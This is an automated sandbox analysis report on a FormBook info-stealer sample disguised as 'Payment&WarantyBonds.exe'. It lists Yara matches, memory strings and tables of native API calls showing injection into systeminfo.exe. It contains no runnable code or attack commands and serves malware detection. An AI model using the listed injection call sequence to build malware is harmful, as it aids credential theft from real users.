Source: systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.west.cn/jiaoyi/
Source: systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.west.cn/services/domain/
Source: systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.west.cn/services/mail/
Source: systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.west.cn/services/webhosting/
Source: systeminfo.exe, 00000007.00000002.4150949460.0000000007590000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4149067807.00000000052D6000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.0000000002BB6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.west.cn/ykj/view.asp?domain=cotti.club

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.Payment&WarantyBonds.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Payment&WarantyBonds.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.4148413603.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2063986251.0000000001740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4148359872.0000000000B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4150364860.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4148377228.0000000002EC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2064136057.00000000021E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Payment&WarantyBonds.exe
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 0_2_07302294 NtQueryInformationProcess, 0_2_07302294
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 0_2_07306308 NtQueryInformationProcess, 0_2_07306308
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0042C483 NtClose, 2_2_0042C483
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014635C0 NtCreateMutant,LdrInitializeThunk, 2_2_014635C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462B60 NtClose,LdrInitializeThunk, 2_2_01462B60
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462DF0 NtQuerySystemInformation,LdrInitializeThunk, 2_2_01462DF0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462C70 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_01462C70
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01463010 NtOpenDirectoryObject, 2_2_01463010
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01463090 NtSetValueKey, 2_2_01463090
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01464340 NtSetContextThread, 2_2_01464340
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01464650 NtSuspendThread, 2_2_01464650
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014639B0 NtGetContextThread, 2_2_014639B0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462BE0 NtQueryValueKey, 2_2_01462BE0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462BF0 NtAllocateVirtualMemory, 2_2_01462BF0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462B80 NtQueryInformationFile, 2_2_01462B80
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462BA0 NtEnumerateValueKey, 2_2_01462BA0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462AD0 NtReadFile, 2_2_01462AD0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462AF0 NtWriteFile, 2_2_01462AF0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462AB0 NtWaitForSingleObject, 2_2_01462AB0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01463D70 NtOpenThread, 2_2_01463D70
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462D00 NtSetInformationFile, 2_2_01462D00
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462D10 NtMapViewOfSection, 2_2_01462D10
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01463D10 NtOpenProcessToken, 2_2_01463D10
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462D30 NtUnmapViewOfSection, 2_2_01462D30
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462DD0 NtDelayExecution, 2_2_01462DD0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462DB0 NtEnumerateKey, 2_2_01462DB0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462C60 NtCreateKey, 2_2_01462C60
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462C00 NtQueryInformationProcess, 2_2_01462C00
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462CC0 NtQueryVirtualMemory, 2_2_01462CC0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462CF0 NtOpenProcess, 2_2_01462CF0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462CA0 NtQueryInformationToken, 2_2_01462CA0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462F60 NtCreateProcessEx, 2_2_01462F60
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462F30 NtCreateSection, 2_2_01462F30
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462FE0 NtCreateFile, 2_2_01462FE0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462F90 NtProtectVirtualMemory, 2_2_01462F90
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462FA0 NtQuerySection, 2_2_01462FA0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462FB0 NtResumeThread, 2_2_01462FB0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462E30 NtWriteVirtualMemory, 2_2_01462E30
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462EE0 NtQueueApcThread, 2_2_01462EE0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462E80 NtReadVirtualMemory, 2_2_01462E80
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01462EA0 NtAdjustPrivilegesToken, 2_2_01462EA0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A4650 NtSuspendThread,LdrInitializeThunk, 7_2_047A4650
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A4340 NtSetContextThread,LdrInitializeThunk, 7_2_047A4340
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2C70 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_047A2C70
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2C60 NtCreateKey,LdrInitializeThunk, 7_2_047A2C60
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2CA0 NtQueryInformationToken,LdrInitializeThunk, 7_2_047A2CA0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2D30 NtUnmapViewOfSection,LdrInitializeThunk, 7_2_047A2D30
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2D10 NtMapViewOfSection,LdrInitializeThunk, 7_2_047A2D10
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2DF0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_047A2DF0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2DD0 NtDelayExecution,LdrInitializeThunk, 7_2_047A2DD0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2EE0 NtQueueApcThread,LdrInitializeThunk, 7_2_047A2EE0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2E80 NtReadVirtualMemory,LdrInitializeThunk, 7_2_047A2E80
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2F30 NtCreateSection,LdrInitializeThunk, 7_2_047A2F30
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2FE0 NtCreateFile,LdrInitializeThunk, 7_2_047A2FE0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2FB0 NtResumeThread,LdrInitializeThunk, 7_2_047A2FB0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2AF0 NtWriteFile,LdrInitializeThunk, 7_2_047A2AF0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2AD0 NtReadFile,LdrInitializeThunk, 7_2_047A2AD0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2B60 NtClose,LdrInitializeThunk, 7_2_047A2B60
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_047A2BF0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2BE0 NtQueryValueKey,LdrInitializeThunk, 7_2_047A2BE0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2BA0 NtEnumerateValueKey,LdrInitializeThunk, 7_2_047A2BA0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A35C0 NtCreateMutant,LdrInitializeThunk, 7_2_047A35C0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A39B0 NtGetContextThread,LdrInitializeThunk, 7_2_047A39B0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2C00 NtQueryInformationProcess, 7_2_047A2C00
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2CF0 NtOpenProcess, 7_2_047A2CF0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2CC0 NtQueryVirtualMemory, 7_2_047A2CC0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2D00 NtSetInformationFile, 7_2_047A2D00
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2DB0 NtEnumerateKey, 7_2_047A2DB0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2E30 NtWriteVirtualMemory, 7_2_047A2E30
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2EA0 NtAdjustPrivilegesToken, 7_2_047A2EA0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2F60 NtCreateProcessEx, 7_2_047A2F60
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2FA0 NtQuerySection, 7_2_047A2FA0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2F90 NtProtectVirtualMemory, 7_2_047A2F90
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2AB0 NtWaitForSingleObject, 7_2_047A2AB0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A2B80 NtQueryInformationFile, 7_2_047A2B80
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A3010 NtOpenDirectoryObject, 7_2_047A3010
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A3090 NtSetValueKey, 7_2_047A3090
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A3D70 NtOpenThread, 7_2_047A3D70
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A3D10 NtOpenProcessToken, 7_2_047A3D10
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_00578FE0 NtCreateFile, 7_2_00578FE0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_00579140 NtReadFile, 7_2_00579140
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_00579230 NtDeleteFile, 7_2_00579230
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_005792D0 NtClose, 7_2_005792D0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_00579440 NtAllocateVirtualMemory, 7_2_00579440
Detected potential crypto function
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 0_2_0284EF04 0_2_0284EF04
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 0_2_07303658 0_2_07303658
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 0_2_07302388 0_2_07302388
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 0_2_07309D60 0_2_07309D60
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 0_2_07305720 0_2_07305720
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 0_2_07303649 0_2_07303649
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 0_2_07306490 0_2_07306490
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 0_2_07302378 0_2_07302378
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 0_2_073052E8 0_2_073052E8
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 0_2_07309FF0 0_2_07309FF0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 0_2_07309FE2 0_2_07309FE2
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 0_2_07308E39 0_2_07308E39
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 0_2_07308E48 0_2_07308E48
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 0_2_07309D50 0_2_07309D50
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 0_2_07305BE0 0_2_07305BE0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 0_2_0B156BB0 0_2_0B156BB0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 0_2_0B152BE8 0_2_0B152BE8
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 0_2_0B150838 0_2_0B150838
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 0_2_0B1510A8 0_2_0B1510A8
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 0_2_0B1527B0 0_2_0B1527B0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 0_2_0B1527A2 0_2_0B1527A2
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 0_2_0B150C70 0_2_0B150C70
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_004184B3 2_2_004184B3
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0040E053 2_2_0040E053
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_00402196 2_2_00402196
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_00401220 2_2_00401220
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0042EA83 2_2_0042EA83
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_00402372 2_2_00402372
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_00402380 2_2_00402380
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0040FDAA 2_2_0040FDAA
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0040FDB3 2_2_0040FDB3
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_004026D2 2_2_004026D2
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_004026E0 2_2_004026E0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_004166EE 2_2_004166EE
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_004166F3 2_2_004166F3
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_004166AC 2_2_004166AC
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_00402F10 2_2_00402F10
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0040FFD3 2_2_0040FFD3
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014B8158 2_2_014B8158
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014FB16B 2_2_014FB16B
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0146516C 2_2_0146516C
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141F172 2_2_0141F172
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01420100 2_2_01420100
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014CA118 2_2_014CA118
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014E81CC 2_2_014E81CC
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014F01AA 2_2_014F01AA
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0143B1B0 2_2_0143B1B0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014DF0CC 2_2_014DF0CC
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014370C0 2_2_014370C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014E70E9 2_2_014E70E9
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014EF0E0 2_2_014EF0E0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141D34C 2_2_0141D34C
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014EA352 2_2_014EA352
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014E132D 2_2_014E132D
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014F03E6 2_2_014F03E6
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0143E3F0 2_2_0143E3F0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0147739A 2_2_0147739A
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D0274 2_2_014D0274
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144B2C0 2_2_0144B2C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D12ED 2_2_014D12ED
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144D2F0 2_2_0144D2F0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014352A0 2_2_014352A0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014E7571 2_2_014E7571
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01430535 2_2_01430535
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014F0591 2_2_014F0591
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014CD5B0 2_2_014CD5B0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014E2446 2_2_014E2446
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01421460 2_2_01421460
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014EF43F 2_2_014EF43F
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014DE4F6 2_2_014DE4F6
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01454750 2_2_01454750
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01430770 2_2_01430770
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0142C7C0 2_2_0142C7C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014EF7B0 2_2_014EF7B0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014E16CC 2_2_014E16CC
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144C6E0 2_2_0144C6E0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01439950 2_2_01439950
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144B950 2_2_0144B950
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01446962 2_2_01446962
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014329A0 2_2_014329A0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014FA9A6 2_2_014FA9A6
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01432840 2_2_01432840
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0143A840 2_2_0143A840
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0149D800 2_2_0149D800
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014338E0 2_2_014338E0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145E8F0 2_2_0145E8F0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014168B8 2_2_014168B8
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014EAB40 2_2_014EAB40
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014EFB76 2_2_014EFB76
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014E6BD7 2_2_014E6BD7
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A5BF0 2_2_014A5BF0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0146DBF9 2_2_0146DBF9
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144FB80 2_2_0144FB80
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014EFA49 2_2_014EFA49
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014E7A46 2_2_014E7A46
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A3A6C 2_2_014A3A6C
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014DDAC6 2_2_014DDAC6
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0142EA80 2_2_0142EA80
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014CDAAC 2_2_014CDAAC
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01475AA0 2_2_01475AA0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01433D40 2_2_01433D40
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014E1D5A 2_2_014E1D5A
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014E7D73 2_2_014E7D73
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0143AD00 2_2_0143AD00
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144FDC0 2_2_0144FDC0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0142ADE0 2_2_0142ADE0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01448DBF 2_2_01448DBF
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01430C00 2_2_01430C00
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A9C32 2_2_014A9C32
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01420CF2 2_2_01420CF2
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014EFCF2 2_2_014EFCF2
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D0CB5 2_2_014D0CB5
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A4F40 2_2_014A4F40
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014EFF09 2_2_014EFF09
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01472F28 2_2_01472F28
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01450F30 2_2_01450F30
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01422FC8 2_2_01422FC8
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01431F92 2_2_01431F92
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014EFFB1 2_2_014EFFB1
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01430E59 2_2_01430E59
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014EEE26 2_2_014EEE26
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014EEEDB 2_2_014EEEDB
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01442E90 2_2_01442E90
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014ECE93 2_2_014ECE93
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01439EB0 2_2_01439EB0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0481E4F6 7_2_0481E4F6
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04814420 7_2_04814420
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04822446 7_2_04822446
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04830591 7_2_04830591
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04770535 7_2_04770535
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0478C6E0 7_2_0478C6E0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04770770 7_2_04770770
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04794750 7_2_04794750
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0476C7C0 7_2_0476C7C0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04802000 7_2_04802000
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_048241A2 7_2_048241A2
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047F8158 7_2_047F8158
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_048301AA 7_2_048301AA
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_048281CC 7_2_048281CC
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04760100 7_2_04760100
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0480A118 7_2_0480A118
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047F02C0 7_2_047F02C0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04810274 7_2_04810274
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_048303E6 7_2_048303E6
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0477E3F0 7_2_0477E3F0
